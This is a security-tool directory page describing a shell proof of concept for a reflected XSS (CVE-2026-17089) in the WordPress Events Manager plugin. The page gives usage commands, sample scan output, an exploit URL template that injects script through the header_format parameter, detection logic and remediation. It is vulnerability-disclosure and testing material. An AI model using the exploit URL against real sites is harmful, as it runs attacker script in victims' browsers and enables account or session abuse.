Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-17089-PoC-pwnVader — Shell PoC for CVE-2026-17089, an unauthenticated reflected XSS in the WordPress Events Manager plugin (<= 7.4.0.1); fingerprints the plugin and tests header_format reflection. | Kitploit
Tools/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Vulnerability ScannersWeb Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

Shell PoC for CVE-2026-17089, an unauthenticated reflected XSS in the WordPress Events Manager plugin (<= 7.4.0.1); fingerprints the plugin and tests header_format reflection.

View Repository
10 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-17089 — Events Manager <= 7.4.0.1 — Unauthenticated reflected XSS (header_format)

Author: pwnVader · License: MIT (repository root)

ComponentEvents Manager – Calendar, Bookings, Tickets, and more! (WordPress plugin)
TypeCWE-79 — Reflected Cross-Site Scripting
Affected<= 7.4.0.1
Fixedlater 7.4.x release (wp_kses_post() applied in EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Summary

The shortcode entry point sanitizes header_format with wp_kses(), but the unauthenticated AJAX action search_events_grouped bypasses that sanitization and echoes the value into the HTML response (EM_Events::output_grouped()). A remote, unauthenticated attacker can craft a URL that executes arbitrary JavaScript in the origin of the affected site for any user who opens it (UI:R).

Usage

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Example output (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

Exploit URL

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Detection logic

  1. Fingerprint: readme.txt (Stable tag) and/or the plugin asset path /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Send a benign marker (``) to admin-ajax.php?action=search_events_grouped with header_format set to the marker and check whether the raw markup is reflected unescaped in the response body.

Remediation

  • Update Events Manager to the current release (the fix applies wp_kses_post() to header_format inside the rendering function, covering every caller).
  • Interim: block the unauthenticated search_events_grouped AJAX action or filter header_format at the WAF/application level.

References

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Disclaimer

For authorized security testing only. The PoC is read-only (check) or prints a URL (url); no data is modified.

Download Tool